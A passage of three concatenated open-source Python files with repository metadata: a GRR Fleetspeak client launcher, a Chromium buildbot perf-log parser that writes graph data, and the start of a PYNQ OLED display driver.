from fleetspeak.src.client.daemonservice.proto.fleetspeak_daemonservice import config_pb2 as fs_daemon_config_pb2
from fleetspeak.src.client.generic.proto.fleetspeak_client_generic import config_pb2 as fs_cli_config_pb2
from fleetspeak.src.common.proto.fleetspeak import system_pb2 as fs_system_pb2
class Error(Exception):
pass
def _CreateClientConfig(tmp_dir: str) -> str:
"""Creates and returns the path to a fleetspeak client config."""
def TmpPath(*args):
return os.path.join(tmp_dir, *args)
server_config_dir = package.ResourcePath(
"fleetspeak-server-bin", "fleetspeak-server-bin/etc/fleetspeak-server")
if not os.path.exists(server_config_dir):
raise Error(
f"Fleetspeak server config dir not found: {server_config_dir}. "
"Please make sure `grr_config_updater initialize` has been run.")
client_config_name = {
"Linux": "linux_client.config",
"Windows": "windows_client.config",
"Darwin": "darwin_client.config",
}
client_config_path = os.path.join(server_config_dir,
client_config_name[platform.system()])
with open(client_config_path, "r") as f:
client_config = text_format.Parse(f.read(), fs_cli_config_pb2.Config())
if client_config.HasField("filesystem_handler"):
client_config.filesystem_handler.configuration_directory = TmpPath()
# We store the client state file in `Logging.path`.
# 1) We need a writable path, where writing a file doesn't surprise the
# user (as opposed to other paths in the source tree).
# 2) We need the state file to be somewhat persistent, i.e. kept after
# re-runs of this command. Otherwise the client ID of the client would
# change at each re-run.
client_config.filesystem_handler.state_file = os.path.join(
config.CONFIG["Logging.path"], "fleetspeak-client.state")
with open(TmpPath("config"), "w") as f:
f.write(text_format.MessageToString(client_config))
return TmpPath("config")
def _CreateServiceConfig(config_dir: str) -> None:
"""Creates a fleetspeak service config in the config directory."""
service_config_path = config.CONFIG["ClientBuilder.fleetspeak_config_path"]
with open(service_config_path, "r") as f:
data = config.CONFIG.InterpolateValue(f.read())
service_config = text_format.Parse(data,
fs_system_pb2.ClientServiceConfig())
daemon_config = fs_daemon_config_pb2.Config()
service_config.config.Unpack(daemon_config)
del daemon_config.argv[:]
daemon_config.argv.extend([
"grr_client",
])
service_config.config.Pack(daemon_config)
utils.EnsureDirExists(os.path.join(config_dir, "textservices"))
with open(os.path.join(config_dir, "textservices", "GRR.textproto"),
"w") as f:
f.write(text_format.MessageToString(service_config))
def _RunClient(tmp_dir: str) -> None:
"""Runs the fleetspeak client."""
config_path = _CreateClientConfig(tmp_dir)
_CreateServiceConfig(tmp_dir)
fleetspeak_client = package.ResourcePath(
"fleetspeak-client-bin",
"fleetspeak-client-bin/usr/bin/fleetspeak-client")
if not fleetspeak_client or not os.path.exists(fleetspeak_client):
raise Error(
f"Fleetspeak client binary not found: {fleetspeak_client}."
"Please make sure that the package `fleetspeak-client-bin` has been "
"installed.")
command = [
fleetspeak_client,
"--logtostderr",
"-config",
config_path,
]
subprocess.check_call(command)
def main(argv):
del argv # unused
config_lib.ParseConfigCommandLine()
with temp.AutoTempDirPath(remove_non_empty=True) as tmp_dir:
_RunClient(tmp_dir)
if __name__ == "__main__":
app.run(main)
| {
"content_hash": "6b91164f9982cf16912b405b09573464",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 113,
"avg_line_length": 36.773109243697476,
"alnum_prop": 0.7047531992687386,
"repo_name": "google/grr",
"id": "f33dc66331c315209c242ec42c15afdf17911040",
"size": "4398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grr/client/grr_response_client/fleetspeak_client_wrapper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "12697"
},
{
"name": "C++",
"bytes": "54814"
},
{
"name": "Dockerfile",
"bytes": "1822"
},
{
"name": "HCL",
"bytes": "8451"
},
{
"name": "HTML",
"bytes": "366783"
},
{
"name": "JavaScript",
"bytes": "13088"
},
{
"name": "Jupyter Notebook",
"bytes": "199216"
},
{
"name": "Makefile",
"bytes": "3244"
},
{
"name": "PowerShell",
"bytes": "531"
},
{
"name": "Python",
"bytes": "8844725"
},
{
"name": "Roff",
"bytes": "444"
},
{
"name": "SCSS",
"bytes": "105120"
},
{
"name": "Shell",
"bytes": "48663"
},
{
"name": "Standard ML",
"bytes": "8172"
},
{
"name": "TypeScript",
"bytes": "2139377"
}
],
"symlink_target": ""
} |
"""Script to parse perf data from Chrome Endure test executions, to be graphed.
This script connects via HTTP to a buildbot master in order to scrape and parse
perf data from Chrome Endure tests that have been run. The perf data is then
stored in local text files to be graphed by the Chrome Endure graphing code.
It is assumed that any Chrome Endure tests that show up on the waterfall have
names that are of the following form:
"endure_<webapp_name>-<test_name>"
This script accepts either a URL or a local path as a buildbot location,
and switches its behavior depending on which one is given.
When a URL is given, it gets buildbot logs from the buildbot builders URL
e.g. http://build.chromium.org/p/chromium.endure/builders/.
When a local path is given, it gets buildbot logs from buildbot's internal
files in the directory e.g. /home/chrome-bot/buildbot.
"""
import cPickle
import getpass
import logging
import optparse
import os
import re
import simplejson
import socket
import string
import sys
import time
import urllib
import urllib2
CHROME_ENDURE_SLAVE_NAMES = [
'Linux QA Perf (0)',
'Linux QA Perf (1)',
'Linux QA Perf (2)',
'Linux QA Perf (3)',
'Linux QA Perf (4)',
'Linux QA Perf (dbg)(0)',
'Linux QA Perf (dbg)(1)',
'Linux QA Perf (dbg)(2)',
'Linux QA Perf (dbg)(3)',
'Linux QA Perf (dbg)(4)',
]
BUILDER_URL_BASE = 'http://build.chromium.org/p/chromium.endure/builders/'
LAST_BUILD_NUM_PROCESSED_FILE = os.path.join(os.path.dirname(__file__),
'_parser_last_processed.txt')
LOCAL_GRAPH_DIR = '/home/%s/www/chrome_endure_clean' % getpass.getuser()
MANGLE_TRANSLATION = string.maketrans(' ()', '___')
def SetupBaseGraphDirIfNeeded(webapp_name, test_name, dest_dir):
"""Sets up the directory containing results for a particular test, if needed.
Args:
webapp_name: The string name of the webapp associated with the given test.
test_name: The string name of the test.
dest_dir: The name of the destination directory that needs to be set up.
"""
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Test name directory.
os.chmod(dest_dir, 0755)
# Create config file.
config_file = os.path.join(dest_dir, 'config.js')
if not os.path.exists(config_file):
with open(config_file, 'w') as f:
f.write('var Config = {\n')
f.write('buildslave: "Chrome Endure Bots",\n')
f.write('title: "Chrome Endure %s Test: %s",\n' % (webapp_name.upper(),
test_name))
f.write('};\n')
os.chmod(config_file, 0755)
# Set up symbolic links to the real graphing files.
link_file = os.path.join(dest_dir, 'index.html')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.html', link_file)
link_file = os.path.join(dest_dir, 'endure_plotter.js')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.js', link_file)
link_file = os.path.join(dest_dir, 'js')
if not os.path.exists(link_file):
os.symlink('../../js', link_file)
def WriteToDataFile(new_line, existing_lines, revision, data_file):
"""Writes a new entry to an existing perf data file to be graphed.
If there's an existing line with the same revision number, overwrite its data
with the new line. Else, prepend the info for the new revision.
Args:
new_line: A dictionary representing perf information for the new entry.
existing_lines: A list of string lines from the existing perf data file.
revision: The string revision number associated with the new perf entry.
data_file: The string name of the perf data file to which to write.
"""
overwritten = False
for i, line in enumerate(existing_lines):
line_dict = simplejson.loads(line)
if line_dict['rev'] == revision:
existing_lines[i] = simplejson.dumps(new_line)
overwritten = True
break
elif int(line_dict['rev']) < int(revision):
break
if not overwritten:
existing_lines.insert(0, simplejson.dumps(new_line))
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
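# A small illustration, not part of the original script: the one-JSON-object-
# per-line layout WriteToDataFile() maintains, newest revision first. The
# metric name and numbers are made up; the short-running trace format
# ([value, "0.0"]) matches what OutputPerfData() below emits.
_EXAMPLE_SUMMARY_DAT_LINES = [
    '{"traces": {"vm_size": ["123456", "0.0"]}, "rev": "212345"}',
    '{"traces": {"vm_size": ["123000", "0.0"]}, "rev": "212300"}',
]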
def OutputPerfData(revision, graph_name, values, units, units_x, dest_dir,
is_stacked=False, stack_order=[]):
"""Outputs perf data to a local text file to be graphed.
Args:
revision: The string revision number associated with the perf data.
graph_name: The string name of the graph on which to plot the data.
values: A dict which maps a description to a value. A value is either a
single data value to be graphed, or a list of 2-tuples
representing (x, y) points to be graphed for long-running tests.
units: The string description for the y-axis units on the graph.
units_x: The string description for the x-axis units on the graph. Should
be set to None if the results are not for long-running graphs.
dest_dir: The name of the destination directory to which to write.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
stack_order: A list that contains key strings in the order to stack values
in the graph.
"""
# Update graphs.dat, which contains metadata associated with each graph.
existing_graphs = []
graphs_file = os.path.join(dest_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file, 'r') as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
existing_graphs = sorted(existing_graphs, key=lambda x: x['name'])
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs, indent=2))
os.chmod(graphs_file, 0755)
# Update summary data file, containing the actual data to be graphed.
data_file_name = graph_name + '-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_traces = {}
for description in values:
value = values[description]
if units_x:
points = []
for point in value:
points.append([str(point[0]), str(point[1])])
new_traces[description] = points
else:
new_traces[description] = [str(value), str(0.0)]
new_line = {
'traces': new_traces,
'rev': revision
}
if is_stacked:
new_line['stack'] = True
new_line['stack_order'] = stack_order
WriteToDataFile(new_line, existing_lines, revision, data_file)
def OutputEventData(revision, event_dict, dest_dir):
"""Outputs event data to a local text file to be graphed.
Args:
revision: The string revision number associated with the event data.
event_dict: A dict which maps a description to an array of tuples
representing event data to be graphed.
dest_dir: The name of the destination directory to which to write.
"""
data_file_name = '_EVENT_-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_events = {}
for description in event_dict:
event_list = event_dict[description]
value_list = []
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events[description] = value_list
new_line = {
'rev': revision,
'events': new_events
}
WriteToDataFile(new_line, existing_lines, revision, data_file)
def UpdatePerfDataFromFetchedContent(
revision, content, webapp_name, test_name, graph_dir, only_dmp=False):
"""Update perf data from fetched stdio data.
Args:
revision: The string revision number associated with the new perf entry.
content: Fetched stdio data.
webapp_name: A name of the webapp.
test_name: A name of the test.
graph_dir: A path to the graph directory.
only_dmp: True if only Deep Memory Profiler results should be used.
"""
perf_data_raw = []
def AppendRawPerfData(graph_name, description, value, units, units_x,
webapp_name, test_name, is_stacked=False):
perf_data_raw.append({
'graph_name': graph_name,
'description': description,
'value': value,
'units': units,
'units_x': units_x,
'webapp_name': webapp_name,
'test_name': test_name,
'stack': is_stacked,
})
# First scan for short-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= ([-\d\.]+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], None,
webapp_name, webapp_name)
# Next scan for long-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= (\[[^\]]+\]) (\S+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
# TODO(dmikurube): Change the condition to use stacked graph when we
# determine how to specify it.
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], match[4],
webapp_name, test_name, match[0].endswith('-DMP'))
# Next scan for events in the test results.
for match in re.findall(
r'RESULT _EVENT_: ([^=]+)= (\[[^\]]+\])', content):
try:
match1 = eval(match[1])
except SyntaxError:
match1 = None
if match1:
AppendRawPerfData('_EVENT_', match[0], match1, None, None,
webapp_name, test_name)
# For each graph_name/description pair that refers to a long-running test
# result or an event, concatenate all the results together (assume results
# in the input file are in the correct order). For short-running test
# results, keep just one if more than one is specified.
perf_data = {} # Maps a graph-line key to a perf data dictionary.
for data in perf_data_raw:
key_graph = data['graph_name']
key_description = data['description']
if not key_graph in perf_data:
perf_data[key_graph] = {
'graph_name': data['graph_name'],
'value': {},
'units': data['units'],
'units_x': data['units_x'],
'webapp_name': data['webapp_name'],
'test_name': data['test_name'],
}
perf_data[key_graph]['stack'] = data['stack']
if 'stack_order' not in perf_data[key_graph]:
perf_data[key_graph]['stack_order'] = []
if (data['stack'] and
data['description'] not in perf_data[key_graph]['stack_order']):
perf_data[key_graph]['stack_order'].append(data['description'])
if data['graph_name'] != '_EVENT_' and not data['units_x']:
# Short-running test result.
perf_data[key_graph]['value'][key_description] = data['value']
else:
# Long-running test result or event.
if key_description in perf_data[key_graph]['value']:
perf_data[key_graph]['value'][key_description] += data['value']
else:
perf_data[key_graph]['value'][key_description] = data['value']
# Finally, for each graph-line in |perf_data|, update the associated local
# graph data files if necessary.
for perf_data_key in perf_data:
perf_data_dict = perf_data[perf_data_key]
dest_dir = os.path.join(graph_dir, perf_data_dict['webapp_name'])
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Webapp name directory.
os.chmod(dest_dir, 0755)
dest_dir = os.path.join(dest_dir, perf_data_dict['test_name'])
SetupBaseGraphDirIfNeeded(perf_data_dict['webapp_name'],
perf_data_dict['test_name'], dest_dir)
if perf_data_dict['graph_name'] == '_EVENT_':
OutputEventData(revision, perf_data_dict['value'], dest_dir)
else:
OutputPerfData(revision, perf_data_dict['graph_name'],
perf_data_dict['value'],
perf_data_dict['units'], perf_data_dict['units_x'],
dest_dir,
perf_data_dict['stack'], perf_data_dict['stack_order'])
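# A small illustration, not part of the original script: the three RESULT line
# shapes the regexes in UpdatePerfDataFromFetchedContent() look for. Metric
# names, numbers and units are made up. Short-running results carry a single
# value, long-running results a list of (x, y) tuples, and _EVENT_ lines a
# list of (time, data) tuples.
_EXAMPLE_STDIO_CONTENT = '\n'.join([
    'RESULT vm_final_size: vm_final_size= 10485760 kb',
    'RESULT vm_size: vm_size= [(0, 100000), (60, 105000)] kb seconds',
    "RESULT _EVENT_: TabSwitch= [(30, 'switched to tab 2')]",
])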
def SlaveLocation(master_location, slave_info):
"""Returns slave location for |master_location| and |slave_info|."""
if master_location.startswith('http://'):
return master_location + urllib.quote(slave_info['slave_name'])
else:
return os.path.join(master_location,
slave_info['slave_name'].translate(MANGLE_TRANSLATION))
def GetRevisionAndLogs(slave_location, build_num):
"""Get a revision number and log locations.
Args:
slave_location: A URL or a path to the build slave data.
build_num: A build number.
Returns:
A pair of the revision number and a list of strings that contain locations
of logs. (False, []) in case of error.
"""
if slave_location.startswith('http://'):
location = slave_location + '/builds/' + str(build_num)
else:
location = os.path.join(slave_location, str(build_num))
revision = False
logs = []
fp = None
try:
if location.startswith('http://'):
fp = urllib2.urlopen(location)
contents = fp.read()
revisions = re.findall(r'<td class="left">got_revision</td>\s+'
'<td>(\d+)</td>\s+<td>Source</td>', contents)
if revisions:
revision = revisions[0]
logs = [location + link + '/text' for link
in re.findall(r'(/steps/endure[^/]+/logs/stdio)', contents)]
else:
fp = open(location, 'rb')
build = cPickle.load(fp)
properties = build.getProperties()
if properties.has_key('got_revision'):
revision = build.getProperty('got_revision')
candidates = os.listdir(slave_location)
logs = [os.path.join(slave_location, filename)
for filename in candidates
if re.match(r'%d-log-endure[^/]+-stdio' % build_num, filename)]
except urllib2.URLError, e:
logging.exception('Error reading build URL "%s": %s', location, str(e))
return False, []
except (IOError, OSError), e:
logging.exception('Error reading build file "%s": %s', location, str(e))
return False, []
finally:
if fp:
fp.close()
return revision, logs
def ExtractTestNames(log_location, is_dbg):
"""Extract test names from |log_location|.
Returns:
    A dict containing the log location, webapp name and test name, or False
    on error.
"""
if log_location.startswith('http://'):
location = urllib.unquote(log_location)
test_pattern = r'endure_([^_]+)(_test |-)([^/]+)/'
else:
location = log_location
test_pattern = r'endure_([^_]+)(_test_|-)([^/]+)-stdio'
  match = re.findall(test_pattern, location)
  if not match:
    logging.error('Test name not in expected format: %s', location)
    return False
  match = match[0]
webapp_name = match[0]
webapp_name = webapp_name + '_dbg' if is_dbg else webapp_name
test_name = match[2]
return {
'location': log_location,
'webapp_name': webapp_name,
'test_name': test_name,
}
def GetStdioContents(stdio_location):
"""Gets appropriate stdio contents.
Returns:
A content string of the stdio log. None in case of error.
"""
fp = None
contents = ''
try:
if stdio_location.startswith('http://'):
fp = urllib2.urlopen(stdio_location, timeout=60)
# Since in-progress test output is sent chunked, there's no EOF. We need
# to specially handle this case so we don't hang here waiting for the
# test to complete.
start_time = time.time()
while True:
data = fp.read(1024)
if not data:
break
contents += data
if time.time() - start_time >= 30: # Read for at most 30 seconds.
break
else:
fp = open(stdio_location)
data = fp.read()
contents = ''
index = 0
# Buildbot log files are stored in the netstring format.
# http://en.wikipedia.org/wiki/Netstring
while index < len(data):
index2 = index
while data[index2].isdigit():
index2 += 1
if data[index2] != ':':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
length = int(data[index:index2])
index = index2 + 1
channel = int(data[index])
index += 1
if data[index+length-1] != ',':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
if channel == 0:
contents += data[index:(index+length-1)]
index += length
except (urllib2.URLError, socket.error, IOError, OSError), e:
# Issue warning but continue to the next stdio link.
logging.warning('Error reading test stdio data "%s": %s',
stdio_location, str(e))
finally:
if fp:
fp.close()
return contents
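# A minimal sketch, not part of the original script: decoding one buildbot
# netstring chunk by hand, in the format GetStdioContents() assumes above
# ("<length>:<channel><payload>," where <length> counts the channel digit
# plus the payload). The sample chunk is made up.
def _ExampleDecodeNetstringChunk(data='6:0hello,'):
  colon = data.index(':')
  length = int(data[:colon])
  channel = int(data[colon + 1])
  payload = data[colon + 2:colon + 1 + length]
  assert data[colon + 1 + length] == ','
  return channel, payload  # -> (0, 'hello')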
def UpdatePerfDataForSlaveAndBuild(
slave_info, build_num, graph_dir, master_location):
"""Process updated perf data for a particular slave and build number.
Args:
slave_info: A dictionary containing information about the slave to process.
build_num: The particular build number on the slave to process.
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if the perf data for the given slave/build is updated properly, or
False if any critical error occurred.
"""
if not master_location.startswith('http://'):
# Source is a file.
from buildbot.status import builder
slave_location = SlaveLocation(master_location, slave_info)
logging.debug(' %s, build %d.', slave_info['slave_name'], build_num)
is_dbg = '(dbg)' in slave_info['slave_name']
revision, logs = GetRevisionAndLogs(slave_location, build_num)
if not revision:
return False
stdios = []
for log_location in logs:
stdio = ExtractTestNames(log_location, is_dbg)
if not stdio:
return False
stdios.append(stdio)
for stdio in stdios:
stdio_location = stdio['location']
contents = GetStdioContents(stdio_location)
if contents:
UpdatePerfDataFromFetchedContent(revision, contents,
stdio['webapp_name'],
stdio['test_name'],
graph_dir, is_dbg)
return True
def GetMostRecentBuildNum(master_location, slave_name):
"""Gets the most recent buld number for |slave_name| in |master_location|."""
most_recent_build_num = None
if master_location.startswith('http://'):
slave_url = master_location + urllib.quote(slave_name)
url_contents = ''
fp = None
try:
fp = urllib2.urlopen(slave_url, timeout=60)
url_contents = fp.read()
except urllib2.URLError, e:
logging.exception('Error reading builder URL: %s', str(e))
return None
finally:
if fp:
fp.close()
matches = re.findall(r'/(\d+)/stop', url_contents)
if matches:
most_recent_build_num = int(matches[0])
else:
matches = re.findall(r'#(\d+)</a></td>', url_contents)
if matches:
most_recent_build_num = sorted(map(int, matches), reverse=True)[0]
else:
slave_path = os.path.join(master_location,
slave_name.translate(MANGLE_TRANSLATION))
files = os.listdir(slave_path)
number_files = [int(filename) for filename in files if filename.isdigit()]
if number_files:
most_recent_build_num = sorted(number_files, reverse=True)[0]
if most_recent_build_num:
logging.debug('%s most recent build number: %s',
slave_name, most_recent_build_num)
else:
logging.error('Could not identify latest build number for slave %s.',
slave_name)
return most_recent_build_num
def UpdatePerfDataFiles(graph_dir, master_location):
"""Updates the Chrome Endure graph data files with the latest test results.
For each known Chrome Endure slave, we scan its latest test results looking
for any new test data. Any new data that is found is then appended to the
data files used to display the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if all graph data files are updated properly, or
False if any error occurred.
"""
slave_list = []
for slave_name in CHROME_ENDURE_SLAVE_NAMES:
slave_info = {}
slave_info['slave_name'] = slave_name
slave_info['most_recent_build_num'] = None
slave_info['last_processed_build_num'] = None
slave_list.append(slave_info)
# Identify the most recent build number for each slave.
logging.debug('Searching for latest build numbers for each slave...')
for slave in slave_list:
slave_name = slave['slave_name']
slave['most_recent_build_num'] = GetMostRecentBuildNum(
master_location, slave_name)
# Identify the last-processed build number for each slave.
logging.debug('Identifying last processed build numbers...')
if not os.path.exists(LAST_BUILD_NUM_PROCESSED_FILE):
for slave_info in slave_list:
slave_info['last_processed_build_num'] = 0
else:
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'r') as fp:
file_contents = fp.read()
for match in re.findall(r'([^:]+):(\d+)', file_contents):
slave_name = match[0].strip()
last_processed_build_num = match[1].strip()
for slave_info in slave_list:
if slave_info['slave_name'] == slave_name:
slave_info['last_processed_build_num'] = int(
last_processed_build_num)
for slave_info in slave_list:
if not slave_info['last_processed_build_num']:
slave_info['last_processed_build_num'] = 0
logging.debug('Done identifying last processed build numbers.')
# For each Chrome Endure slave, process each build in-between the last
# processed build num and the most recent build num, inclusive. To process
# each one, first get the revision number for that build, then scan the test
# result stdio for any performance data, and add any new performance data to
# local files to be graphed.
for slave_info in slave_list:
logging.debug('Processing %s, builds %d-%d...',
slave_info['slave_name'],
slave_info['last_processed_build_num'],
slave_info['most_recent_build_num'])
curr_build_num = slave_info['last_processed_build_num']
while curr_build_num <= slave_info['most_recent_build_num']:
if not UpdatePerfDataForSlaveAndBuild(slave_info, curr_build_num,
graph_dir, master_location):
# Do not give up. The first files might be removed by buildbot.
logging.warning('Logs do not exist in buildbot for #%d of %s.' %
(curr_build_num, slave_info['slave_name']))
curr_build_num += 1
# Log the newly-processed build numbers.
logging.debug('Logging the newly-processed build numbers...')
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'w') as f:
for slave_info in slave_list:
f.write('%s:%s\n' % (slave_info['slave_name'],
slave_info['most_recent_build_num']))
return True
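# Example, not part of the original script, of the bookkeeping file written
# above: one "slave name:build number" pair per line. The build numbers are
# made up.
_EXAMPLE_LAST_PROCESSED_CONTENT = (
    'Linux QA Perf (0):1234\n'
    'Linux QA Perf (dbg)(0):1230\n'
)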
def GenerateIndexPage(graph_dir):
"""Generates a summary (landing) page for the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
"""
logging.debug('Generating new index.html page...')
# Page header.
page = """
<html>
<head>
<title>Chrome Endure Overview</title>
<script language="javascript">
function DisplayGraph(name, graph) {
document.write(
'<td><iframe scrolling="no" height="438" width="700" src="');
document.write(name);
document.write('"></iframe></td>');
}
</script>
</head>
<body>
<center>
<h1>
Chrome Endure
</h1>
"""
# Print current time.
page += '<p>Updated: %s</p>\n' % (
time.strftime('%A, %B %d, %Y at %I:%M:%S %p %Z'))
# Links for each webapp.
webapp_names = [x for x in os.listdir(graph_dir) if
x not in ['js', 'old_data', '.svn', '.git'] and
os.path.isdir(os.path.join(graph_dir, x))]
webapp_names = sorted(webapp_names)
page += '<p> ['
for i, name in enumerate(webapp_names):
page += '<a href="#%s">%s</a>' % (name.upper(), name.upper())
if i < len(webapp_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each webapp.
for webapp_name in webapp_names:
page += '\n<h1 id="%s">%s</h1>\n' % (webapp_name.upper(),
webapp_name.upper())
# Links for each test for this webapp.
test_names = [x for x in
os.listdir(os.path.join(graph_dir, webapp_name))]
test_names = sorted(test_names)
page += '<p> ['
for i, name in enumerate(test_names):
page += '<a href="#%s">%s</a>' % (name, name)
if i < len(test_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each test for this webapp.
for test_name in test_names:
# Get the set of graph names for this test.
graph_names = [x[:x.find('-summary.dat')] for x in
os.listdir(os.path.join(graph_dir,
webapp_name, test_name))
if '-summary.dat' in x and '_EVENT_' not in x]
graph_names = sorted(graph_names)
page += '<h2 id="%s">%s</h2>\n' % (test_name, test_name)
page += '<table>\n'
for i, graph_name in enumerate(graph_names):
if i % 2 == 0:
page += ' <tr>\n'
page += (' <script>DisplayGraph("%s/%s?graph=%s&lookout=1");'
'</script>\n' % (webapp_name, test_name, graph_name))
if i % 2 == 1:
page += ' </tr>\n'
if len(graph_names) % 2 == 1:
page += ' </tr>\n'
page += '</table>\n'
# Page footer.
page += """
</center>
</body>
</html>
"""
index_file = os.path.join(graph_dir, 'index.html')
with open(index_file, 'w') as f:
f.write(page)
os.chmod(index_file, 0755)
def main():
parser = optparse.OptionParser()
parser.add_option(
'-v', '--verbose', action='store_true', default=False,
help='Use verbose logging.')
parser.add_option(
'-s', '--stdin', action='store_true', default=False,
help='Input from stdin instead of slaves for testing this script.')
parser.add_option(
'-b', '--buildbot', dest='buildbot', metavar="BUILDBOT",
default=BUILDER_URL_BASE,
help='Use log files in a buildbot at BUILDBOT. BUILDBOT can be a '
'buildbot\'s builder URL or a local path to a buildbot directory. '
'Both an absolute path and a relative path are available, e.g. '
'"/home/chrome-bot/buildbot" or "../buildbot". '
'[default: %default]')
parser.add_option(
'-g', '--graph', dest='graph_dir', metavar="DIR", default=LOCAL_GRAPH_DIR,
help='Output graph data files to DIR. [default: %default]')
options, _ = parser.parse_args(sys.argv)
logging_level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(level=logging_level,
format='[%(asctime)s] %(levelname)s: %(message)s')
if options.stdin:
content = sys.stdin.read()
UpdatePerfDataFromFetchedContent(
'12345', content, 'webapp', 'test', options.graph_dir)
else:
if options.buildbot.startswith('http://'):
master_location = options.buildbot
else:
build_dir = os.path.join(options.buildbot, 'build')
third_party_dir = os.path.join(build_dir, 'third_party')
sys.path.append(third_party_dir)
sys.path.append(os.path.join(third_party_dir, 'buildbot_8_4p1'))
sys.path.append(os.path.join(third_party_dir, 'twisted_10_2'))
master_location = os.path.join(build_dir, 'masters',
'master.chromium.endure')
success = UpdatePerfDataFiles(options.graph_dir, master_location)
if not success:
logging.error('Failed to update perf data files.')
sys.exit(0)
GenerateIndexPage(options.graph_dir)
logging.debug('All done!')
if __name__ == '__main__':
main()
| {
"content_hash": "d99c10ded1dc3c75f681bbd345147f2c",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 80,
"avg_line_length": 35.21001221001221,
"alnum_prop": 0.6230883933835004,
"repo_name": "anirudhSK/chromium",
"id": "f477270e4895f0d87f820cc3c28bcf34a7d96666",
"size": "29026",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chrome/test/functional/perf/endure_result_parser.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "52960"
},
{
"name": "Awk",
"bytes": "8660"
},
{
"name": "C",
"bytes": "42502191"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "201859263"
},
{
"name": "CSS",
"bytes": "946557"
},
{
"name": "DOT",
"bytes": "2984"
},
{
"name": "Java",
"bytes": "5687122"
},
{
"name": "JavaScript",
"bytes": "22163714"
},
{
"name": "M",
"bytes": "2190"
},
{
"name": "Matlab",
"bytes": "2496"
},
{
"name": "Objective-C",
"bytes": "7670589"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "Perl",
"bytes": "672770"
},
{
"name": "Python",
"bytes": "10873885"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "1315894"
},
{
"name": "Tcl",
"bytes": "277091"
},
{
"name": "TypeScript",
"bytes": "1560024"
},
{
"name": "XSLT",
"bytes": "13493"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
} |
from . import Pmod
PMOD_OLED_PROGRAM = "pmod_oled.bin"
CLEAR_DISPLAY = 0x1
PRINT_STRING = 0x3
DRAW_LINE = 0x5
DRAW_RECT = 0x7
class Pmod_OLED(object):
"""This class controls an OLED Pmod.
    The Pmod OLED (PB 200-222) is a 128x32 pixel monochrome organic LED (OLED)
panel powered by the Solomon Systech SSD1306.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
"""
def __init__(self, mb_info, text=None):
"""Return a new instance of an OLED object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
text: str
The text to be displayed after initialization.
"""
self.microblaze = Pmod(mb_info, PMOD_OLED_PROGRAM)
self.clear()
if text:
self.write(text)
def clear(self):
"""Clear the OLED screen.
This is done by sending the clear command to the IOP.
Returns
-------
None
"""
self.microblaze.write_blocking_command(CLEAR_DISPLAY)
def write(self, text, x=0, y=0):
"""Write a new text string on the OLED.
Parameters
----------
text : str
The text string to be displayed on the OLED screen.
x : int
The x-position of the display.
y : int
The y-position of the display.
Returns
-------
None
"""
if not 0 <= x <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y <= 255:
raise ValueError("Y-position should be in [0, 255]")
if len(text) >= 64:
raise ValueError("Text too long to be displayed.")
# First write length, x, y, then write rest of string
data = [len(text), x, y]
data += [ord(char) for char in text]
self.microblaze.write_mailbox(0, data)
# Finally write the print string command
self.microblaze.write_blocking_command(PRINT_STRING)
def draw_line(self, x1, y1, x2, y2):
